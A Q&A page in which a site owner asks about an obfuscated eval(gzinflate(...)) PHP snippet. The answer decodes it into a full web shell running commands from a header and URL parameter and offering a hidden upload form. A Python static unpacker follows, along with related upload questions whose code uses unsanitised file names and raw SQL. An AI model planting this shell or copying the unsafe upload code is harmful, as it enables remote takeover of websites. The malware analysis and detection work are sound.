A suspected code uploaded in my website - php

Could someone explain to me what the effect of this snippet is:
eval(gzinflate(str_rot13(base64_decode('DdHJZaJAAADQX8ktQWQAISzWWSVyUAdOAU6WhliKpUwEpExx8esn7xfe1+e/L0WSNzzHza5rSI+8iSe8G6fhdOimPbdY4hELHz8ZQbsM794x0ZOwNxaooVyjPDqIt16eNJbkEyo0fMZegybPsQ+FSvKaE4xNv6Za7cURokS3tgFbjtIzVaJECOXQcc/HRO9oVHY9iTSnq58/F+HUuSBxTiWIVrAZ6ZW9kYle2YPOTrxXE2KGRSDzmsC113CcKRnd3asSrIEwz2gh8uz3zJTKvHFXy5YPz1Uti1xshTfomvsGFyUW6ray21bNtpgwI6UmdkJV4Wk314QUgjH32JAkfbBhuvp3kcD+oiOz7MetE3w/litBrktQNC5nZOpGyYrmV6kKVgZa02bImL6Zy4JRYKbqgM0xIS6X+Iy74fai3gvJgc9ItPKKC3wESZWwTWcEfGealUXmof1P+svlFWIU7hENqMO6YlDopKeX3kSGFVSSZufsjBq3CeH8RVlAB51qzzJLZMemFnabbHkAzgFoU/B2XAXsnqPgJjIheHq8REYvu+L3FpcNIh0FglectVd7SV8iIThgOtI22K5sfCqf9LwdyRi86hDaM2MPzHzLdToOPdO6664iqwHH9LL9XDD8evrYDv6DiDdLlHwGsuuDTdYhzYaBXSqRySX4/ufX37evz/8='))));

Your server has been hacked. See https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server for recovery tips. This code allows an attacker to upload any file they want to your server. It decodes to:
<?php error_reporting(0); ?>
<?php system($_SERVER["HTTP_SHELL"]);
if ($_GET["x"]=="kaMtiEz") {
?>
<form method="POST" enctype="multipart/form-data" action="<?$_SERVER["PHP_SELF"]?>">
<input type="file" name="myFile"><input type="submit" name="ok" value="Upload">
</form>
<?php
if (isset($_POST["ok"]) && isset($_FILES["myFile"])) {
$file = $_FILES["myFile"]["tmp_name"];
$name = $_FILES["myFile"]["name"];
if (!move_uploaded_file($file, $name)) {
echo "Unable to upload file";
} else {
echo "File Uploaded...";
}
}
}
if (!empty($_GET["x"])) {
echo "<pre>";
system($_GET["x"]);
echo "Copyright 2011 by kaMtiEz - MagelangCyber Team ! d0nt rem0ve copyright if u real hax0r </pre>";
exit;
}
?>
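An added example, not part of the original answer: a static unpacker in Python for the eval(gzinflate(str_rot13(base64_decode(...)))) chain shown in the question. It recovers the plaintext without executing anything and lists risky tokens. The function names, the RISKY token list and the sample payload are constructed for this illustration.

```python
import base64
import re
import zlib

# The packing chain from the question: eval(gzinflate(str_rot13(base64_decode('...'))))
PACKED = re.compile(
    rb"eval\s*\(\s*gzinflate\s*\(\s*str_rot13\s*\(\s*base64_decode\s*\(\s*"
    rb"['\"]([A-Za-z0-9+/=\s]+)['\"]", re.IGNORECASE)
# Tokens worth flagging once the payload is readable (all appear in the decoded code above).
RISKY = (b"system(", b"move_uploaded_file(", b"$_GET", b"$_FILES", b"$_SERVER")
# PHP's str_rot13 rotates ASCII letters only and leaves every other byte alone.
_LOWER, _UPPER = b"abcdefghijklmnopqrstuvwxyz", b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
ROT13 = bytes.maketrans(_LOWER + _UPPER,
                        _LOWER[13:] + _LOWER[:13] + _UPPER[13:] + _UPPER[:13])

def unpack(blob: bytes, max_out: int = 1 << 20) -> bytes:
    """Undo one layer statically: base64 -> rot13 -> raw DEFLATE. Nothing is executed."""
    raw = base64.b64decode(blob).translate(ROT13)
    # gzinflate() reads headerless DEFLATE (wbits=-15); cap output against zip bombs.
    return zlib.decompressobj(-15).decompress(raw, max_out)

def triage(source: bytes, max_layers: int = 10) -> dict:
    """Peel nested layers, then report which risky tokens the plaintext contains."""
    layers = 0
    match = PACKED.search(source)
    while match and layers < max_layers:
        source = unpack(match.group(1))
        layers += 1
        match = PACKED.search(source)
    hits = [t.decode() for t in RISKY if t in source] if layers else []
    return {"layers": layers, "indicators": hits, "plain": source}

def _wrap(php: bytes) -> bytes:
    """Test fixture only: build a constructed sample in the same packed format."""
    deflater = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = (deflater.compress(php) + deflater.flush()).translate(ROT13)
    return b"eval(gzinflate(str_rot13(base64_decode('" + base64.b64encode(raw) + b"'))));"

# Constructed, inert payload: the risky call is commented out, but the tokens still match.
INNER = b'echo "constructed sample"; /* system($_GET["x"]); */'
SAMPLE = b"<?php " + _wrap(_wrap(INNER)) + b" ?>"

if __name__ == "__main__":
    report = triage(SAMPLE)
    print(report["layers"], report["indicators"], report["plain"].decode())
```

A file that reports one or more layers deserves a manual look even when the indicator list is empty, since the token list is only a starting point.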

Related

How to upload the audio file using php

I wanted to upload the mp3 file to the folder named /uploads/ inside my project folder, but something is not working correctly in PHP. Image files upload without any error, but when I try to upload the mp3 file it does not work.
Here is my html form
<form action="act_songs.php" method="post" enctype="multipart/form-data">
<?php
if (isset($_SESSION['msg'])) {
echo $_SESSION['msg'];
unset($_SESSION['msg']);
}
?>
<p>
<label>Song Title</label>
<input type="text" name="sng-title">
</p>
<p>
<label>Song Name</label>
<input type="file" name="mp3" accept="audio/*" runat="server">
</p>
<p>
<input type="submit" name="add-song" value="ADD">
</p>
</form>
And here is my php code
if (isset($_POST['add-song'])) {
$title = $_POST['sng-title'];
$audio = $_FILES['mp3']['name'];
$audio_type = $_FILES['mp3']['type'];
$audio_size = $_FILES['mp3']['size'];
$tmp_location = $_FILES['mp3']['tmp_name'];
$audio_url = "../uploads/".$audio;
if ($type == '.mp3' || $type == '.wav') {
if ($size <= 5000) {
move_uploaded_file($tmp_location, $audio_url);
}
}
if (!empty($title)) {
$sql = "insert into `tbl_songs` (`title`,`songs`) values ('$title','$audio_url')";
$sql_run = mysql_query($sql);
if ($sql_run) {
$_SESSION['msg'] = "<div class='alert'>Record Saved</div>";
header('location:songs.php');
}
else{
$_SESSION['msg'] = "<div class='alert'>Record Cannot Saved</div>";
header('location:add-songs.php?invalid');
}
}
else{
$_SESSION['msg'] = "<div class='alert'>Title Must be requiired.</div>";
header('location:add-songs.php?invalid');
}
}
What is the problem? I am unable to debug it. If anybody has a solution, please post your answer.

Uploading files in php (doing nothing)

<?php
$pagetitle='Userfiles';
include 'includes/header.php';
if($_POST)
{
if(count($_FILES)>=0)
{
if(move_uploaded_file($_FILES['file']['tmp_name'],
'Files'.DIRECTORY_SEPARATOR.$_FILES['file']['name']))
{
echo 'You uploaded your file successfully!';
}
else {
echo 'Error';
}
}
}
?>
<form method="POST" enctype="multipart/form-data">
<div><input type="file" name="file"></div>
<div><input type="submit" value="Upload"></div>
</form>
<?php
include 'includes/footer.php';
?>
I want to upload some files. Probably the simplest idea but it doesn't work and I don't know why. Any suggestions why when I press Upload the file just disappears?
Your problem is that you're checking the $_POST superglobal when you should in fact check only the $_FILES superglobal:
<?php
$pagetitle='Userfiles';
include 'includes/header.php';
if($_FILES)
{
if(move_uploaded_file($_FILES['file']['tmp_name'],
'Files'.DIRECTORY_SEPARATOR.$_FILES['file']['name']))
{
echo 'You uploaded your file successfully!';
}
else {
echo 'Error';
}
}
?>
<form method="POST" enctype="multipart/form-data">
<div><input type="file" name="file"></div>
<div><input type="submit" value="Upload"></div>
</form>
<?php
include 'includes/footer.php';
?>

PHP and html uploader

I have a problem with my code, but it is not about an error.
1) When I hit refresh I still see the previously echoed variables.
2) When I choose a file, it is supposed to transfer from temp_name into 'uploads/' but it doesn't, and it doesn't show the 'uploaded' message.
3) When I don't choose a file and submit it, it should say 'please choose a file'.
Can you explain to me HOW to solve my issues and WHY these things are happening?
<?php
if (isset($_POST['submit'])){
$size=$_FILES['file']['size'].'kb'."<br>";
$name=$_FILES['file']['name']."<br>";
$type=$_FILES['file']['type']."<br>";
$tmp_name=$_FILES['file']['tmp_name']."<br>";
if (isset($name))
{
if(!empty($name))
{
$location='uploads/';
if (move_uploaded_file($tmp_name,$location.$name))
{
echo 'UPLOADED';
}
echo 'OK.';
}else
{
echo 'please choose a file.';
}
}
}
?>
<form action="upload.php" method="POST" enctype="multipart/form-data">
<br>
<input type ="file" name="file">
<br> <br>
<input type="submit" name="submit" value ="Submit">
</form>
<?php
echo 'File size: '.$size;
echo 'File name: '.$name;
echo 'File type: '.$type;
//echo 'File temporary place: '.$tmp_name;
?>
PS: this is a screenshot from page after just hit the refresh button
Here you go, using the file error value. Values will be 0 to 8 for different issues: http://php.net/manual/en/features.file-upload.errors.php
if (isset($_POST['submit'])){
if ($_FILES["file"]["error"]==0){ //success so far
$size=$_FILES['file']['size'];
$name=$_FILES['file']['name'];
$type=$_FILES['file']['type'];
$tmp_name=$_FILES['file']['tmp_name'];
$location='uploads/';
try{
$result = move_uploaded_file($tmp_name,$location.$name); // this will throw warnings though!
if($result){
echo 'UPLOADED AND MOVED';
}else{
echo "Unable to move the file";
}
}catch(Exception $e){
echo "Sorry there was a problem ".$e->getMessage(); // PHP calls methods with ->, not .
}
}else{ //some sort of problem
echo "There was a problem with the upload (error code: ".$_FILES["file"]["error"].")";
if($_FILES["file"]["error"]==4 ){ // UPLOAD_ERR_NO_FILE
echo "<br/> Please choose a file to upload";
}
}
}
Make sure that your uploads folder exists and the permissions are set correctly. Displaying the correct errors may help.

Multiple file upload error

I found a nice tutorial on YouTube by Anthoniraj Amalanathan. In the video tutorial, it works fine for him, but when I try to replicate it, I get an error. Here is the code:
<form action="<?php $_SERVER['PHP_SELF']; ?>" enctype="multipart/form-data" method="post">
<input type="file" name="upload[]">
<input type="file" name="upload[]">
<input type="submit" name="send" value="Send Now">
</form>
<?php
if(isset($_FILES['upload'])=== true)
{
$files = $_FILES['upload'];
for($x=0;$x<count($files['name']);$x++)
{
$name=$files['name'][$x];
$tmp_name = $file['tmp_name'][$x];
move_uploaded_file($files,'test/'.$name);
echo 'Upload OK';
}
}
?>
The message states that the error is on line 12 ($tmp_name = $file['tmp_name'][$x];) but I don't seem to figure out why.
Can someone help here?
Try this, I tested it and it works for me.
<form action="<?php $_SERVER['PHP_SELF']; ?>" enctype="multipart/form-data" method="post">
<input type="file" name="upload[]">
<input type="file" name="upload[]">
<input type="submit" name="send" value="Send Now">
</form>
<?php
if(isset($_FILES['upload'])=== true) {
$files = $_FILES['upload'];
for($x=0;$x<count($files['name']);$x++) {
$name = $files['name'][$x];
$tmp_name = $files['tmp_name'][$x]; // $files, not the undeclared $file
move_uploaded_file($files['tmp_name'][$x],'test/'.$name);
echo 'Upload OK';
}
}
?>
The error I got came from using an array as the temp. file location. By changing it to $files['tmp_name'][$x], it worked.
Old: move_uploaded_file($files,'test/'.$name);
New: move_uploaded_file($files['tmp_name'][$x],'test/'.$name);
It's just a typo. $file is never declared, it should be $files.
Here:
$tmp_name = $file['tmp_name'][$x];
// ^ missing s
Also here:
move_uploaded_file($files,'test/'.$name);
// ^^^^^^ shouldn't this be $tmp_name?
Try like this :
<?php
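// tmp_name is an array for upload[] inputs, so only test that it is present here;
// move_uploaded_file() below verifies each individual file.
if(isset($_FILES['upload']['tmp_name'])){
foreach($_FILES['upload']['name'] as $x=>$name) {
$name = basename($_FILES['upload']['name'][$x]);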
$folder = 'test/';
$full_path = $folder.$name ;
if(move_uploaded_file($_FILES['upload']['tmp_name'][$x], $full_path)) {
echo 'Upload OK';
} else {
echo 'Upload Failed';
}
}
}else{
echo 'Upload Not Received';
}
?>

re-sizing image in php error in server

I have code for resizing an image in PHP... it works well on my local machine and splits correctly... images are visible in all 4 sizes... but when I am using this on the server... the image is resized... the original image is visible... the resized image is not visible... it comes out black... what is the solution for it... here is the code I used...
main.php
<?php
if(isset($_POST['submit']))
{
$uploaddir = 'uploads/';
$file = basename($_FILES['uploadedfile']['name']);
$uploadfile = $uploaddir . $file;
move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $uploadfile);
include ("thumb.php");
$target=$_FILES['uploadedfile']['name'];
$new='uploads/'."thumb_".$target;
$type=$_FILES['uploadedfile']['type'];
$w=90;
$h=90;
resize($target,$new,$w,$h,$type);
include ("medium.php");
$new1='uploads/'."middle_".$target;
$type1=$_FILES['uploadedfile']['type'];
$w1=400;
$h1=400;
resizee($target,$new1,$w1,$h1,$type1);
include ("big.php");
$new2='uploads/'."big_".$target;
$type2=$_FILES['uploadedfile']['type'];
$w2=900;
$h2=900;
resizeee($target,$new2,$w2,$h2,$type2);
echo "thumb_".$target."<br>";
echo "middle_".$target."<br>";
echo "big_".$target."<br>";
}
?>
<html>
<body>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="uploadedfile">
<input type="submit" name="submit">
</form>
</body>
</html>
thumb.php
<?php
function resize($target,$new,$w,$h,$type)
{
echo $target;
list($wo,$ho)=getimagesize('uploads/'.$target);
if($type=="image/jpeg")
{
$m=imagecreatefromjpeg('uploads/'.$target);
}
elseif($type=="image/gif")
{
$m=imagecreatefromgif('uploads/'.$target);
}
elseif($type=="image/png")
{
$m=imagecreatefrompng('uploads/'.$target);
}
$change=imagecreatetruecolor($w,$h);
imagecopyresampled($change,$m,0,0,0,0,$w,$h,$wo,$ho);
imagejpeg($change,$new,90);
}
?>
medium.php
<?php
function resizee($target,$new1,$w1,$h1,$type)
{
list($wo1,$ho1)=getimagesize('uploads/'.$target);
if($type=="image/jpeg")
{
$m1=imagecreatefromjpeg('uploads/'.$target);
}
elseif($type=="image/gif")
{
$m1=imagecreatefromgif('uploads/'.$target);
}
elseif($type=="image/png")
{
$m1=imagecreatefrompng('uploads/'.$target);
}
$change1=imagecreatetruecolor($w1,$h1);
imagecopyresampled($change1,$m1,0,0,0,0,$w1,$h1,$wo1,$ho1);
imagejpeg($change1,$new1,500);
}
?>
big.php
<?php
function resizeee($target,$new2,$w2,$h2,$type)
{
list($wo2,$ho2)=getimagesize('uploads/'.$target);
if($type=="image/jpeg")
{
$m2=imagecreatefromjpeg('uploads/'.$target);
}
elseif($type=="image/gif")
{
$m2=imagecreatefromgif('uploads/'.$target);
}
elseif($type=="image/png")
{
$m2=imagecreatefrompng('uploads/'.$target);
}
$change2=imagecreatetruecolor($w2,$h2);
imagecopyresampled($change2,$m2,0,0,0,0,$w2,$h2,$wo2,$ho2);
imagejpeg($change2,$new2,900);
}
?>
You may want to check the permissions on the file / directory to make sure that they are readable and writable by your PHP script.
